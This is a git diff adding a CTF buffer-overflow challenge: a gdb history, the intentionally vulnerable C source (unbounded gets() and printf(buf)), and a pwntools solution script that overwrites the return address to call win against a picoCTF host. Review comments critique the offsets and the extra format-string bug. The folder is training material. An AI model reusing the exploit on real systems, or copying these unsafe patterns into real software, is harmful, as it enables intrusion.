diff --git a/buffer_overflow_2/.gdb_history b/buffer_overflow_2/.gdb_history
new file mode 100644
index 0000000..918d673
--- /dev/null
+++ b/buffer_overflow_2/.gdb_history
@@ -0,0 +1,176 @@
+r
+exit
+exit
+disassemble vuln
+b *vuln+44
+c
+c
+exit
+b *vuln+44
+c
+stackf
+disassemble vuln
+b *vuln+29
+exit
+b *vuln+29
+c
+b *vuln+29
+continue
+disassemble vuln
+b *vuln+44
+c
+stackf
+hexdump
+hexdump
+hexdump help
+hexdump $sp 20
+hexdump $sp 20
+hexdump $sp 100
+hexdump $sp 120
+hexdump $sp 140
+hexdump $sp 160
+c
+c
+b *vuln+44
+c
+stackf
+disassemble win
+b *win
+c
+stackf
+disassemble win
+b *win+11
+c
+stackf
+c
+b *win+11
+c
+c
+exit
+b *win+11
+c
+stackf
+nexti
+exit
+disassemble vuln
+b *vuln+75
+c
+disassemble vuln
+b *vuln+57
+c
+nexti
+stackf
+disassemble vuln
+disassemble win
+hexdump $ebp+0x08
+stackf
+c
+disassemble win
+b *win+118
+c
+c
+exit
+b *win+118
+c
+b *vuln+57
+c
+stackf
+nexti
+stackf
+disassemble win
+b *win+16
+c
+stackf
+disassemble win
+stackf
+hexdump $sp 100
+hexdump $sp 200
+c
+c
+b *win+16
+c
+hexdump $sp 200
+stackf
+c
+c
+c
+exit
+c
+stackf
+disassemble win
+b *win+7
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+c
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+disassemble *main
+exit
+b *win+7
+c
+stackf
+hexdump $sp 200
+disassemble *win
+nexti
+disassemble *win
+nexti
+disassemble *win
+nexti
+disassemble *win
+hexdump $sp 200
+nexti
+hexdump $sp 200
+c
+c
+exit
+disassemble *win
+b *win+118
+c
+stackf
+hexdump $sp 200
+disassemble *win
+b *win+118
+c
+hexdump $sp 200
+disassemble *win
+hexdump $ebp
+b *win+118
+c
+disassemble *win
+stackf
+c
+c
+exit
+b *win+118
+c
+stackf
+disassemble win
+hexdump $ebp
+hexdump $ebp+8
+nexti
+nexti
+stackf
+b *win+118
+c
+nexti
+nexti
+hexdump $ebp
+hexdump $ebp+8
+hexdump $ebp+12
+c
+b *win+118
+c
+stackf
+disassemble win
+b *win+143
+c
+disassemble win
+nexti
+c
+exit
diff --git a/buffer_overflow_2/flag.txt b/buffer_overflow_2/flag.txt
new file mode 100644
index 0000000..f90365f
--- /dev/null
+++ b/buffer_overflow_2/flag.txt
@@ -0,0 +1 @@
+{test}
diff --git a/buffer_overflow_2/sol.py b/buffer_overflow_2/sol.py
new file mode 100755
index 0000000..0a9a557
--- /dev/null
+++ b/buffer_overflow_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+from pwn import *
+context.terminal = "kitty"
+
+win_address = 0x08049296
+
+buffer_base = 0xfffe422c
+ret_location = 0xfffe429c
+ret_offset = ret_location - buffer_base
+
+ebp_offset = 112
+arg1 = 0xCAFEF00D
+arg2 = 0xF00DF00D
+
+conn = remote("saturn.picoctf.net", 56706)
+#conn = process("./vuln")
+#attach(conn)
+
+conn.recvline()
+conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
+conn.recvline()
+rest = conn.recvuntil(b'}')
+log.info(f"got {rest}")
+
diff --git a/buffer_overflow_2/vuln b/buffer_overflow_2/vuln
new file mode 100755
index 0000000..accb967
Binary files /dev/null and b/buffer_overflow_2/vuln differ
diff --git a/buffer_overflow_2/vuln.c b/buffer_overflow_2/vuln.c
new file mode 100644
index 0000000..3771956
--- /dev/null
+++ b/buffer_overflow_2/vuln.c
@@ -0,0 +1,44 @@
+#include
+#include
+#include
+#include
+#include
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+ char buf[FLAGSIZE];
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,FLAGSIZE,f);
+ if (arg1 != 0xCAFEF00D)
+ return;
+ if (arg2 != 0xF00DF00D)
+ return;
+ printf(buf);
+}
+
+void vuln(){
+ char buf[BUFSIZE];
+ gets(buf);
+ puts(buf);
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+
+ puts("Please enter your string: ");
+ vuln();
+ return 0;
+}
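Review bot: `buffer_base` and `ret_location` are absolute stack addresses copied out of one local gdb session, but only their difference is used (0xfffe429c - 0xfffe422c == 112), and that is the same 112 hard-coded again as `ebp_offset`, so the script carries one number under two names; the name `ebp_offset` is also misleading, because 112 is the slot of vuln's saved return address (the saved ebp sits 4 bytes below it), and `ebp_offset+0x8`/`+0xc` work only because win's two argument slots lie 8 and 12 bytes past that overwritten return address. I would keep a single measured constant and derive the rest from it: `ret_offset = 112  # buf start -> vuln's saved return address, measured in gdb`, `arg1_offset = ret_offset + 8  # win's arg slots relative to the faked return`, `arg2_offset = ret_offset + 12`, and use those three as the `flat` keys. Leaving the absolute addresses in invites the wrong assumption that they are stable under ASLR or identical between the local binary and the remote service. Separately, the f-string on the last line requires Python 3, so the shebang should read `#!/usr/bin/env python3`.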
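Review bot: `printf(buf);` at the end of win passes the flag buffer as the format string, a second weakness independent of the `gets(buf)` overflow in vuln, and nothing in the file says which bugs are the intended challenge; if only the overflow is deliberate this line should be `printf("%s", buf);`, and if both are, each deserves a comment saying so, e.g. above vuln: `/* INTENTIONALLY VULNERABLE: gets() is unbounded, so input past buf[BUFSIZE] overwrites the saved return address and the slots sol.py fills with win's arguments. */`. The `fgets(buf,FLAGSIZE,f)` result is never checked and `buf` is not initialised, so with an empty or unreadable flag.txt the later `printf(buf)` formats whatever was left on the stack, and the `FILE *f` is never closed on the success path. The five `#include` lines carry no header name as rendered here; presumably `<stdio.h>`, `<stdlib.h>`, `<unistd.h>` and the like were stripped by the page, but if the committed file really has them empty it does not compile as shown.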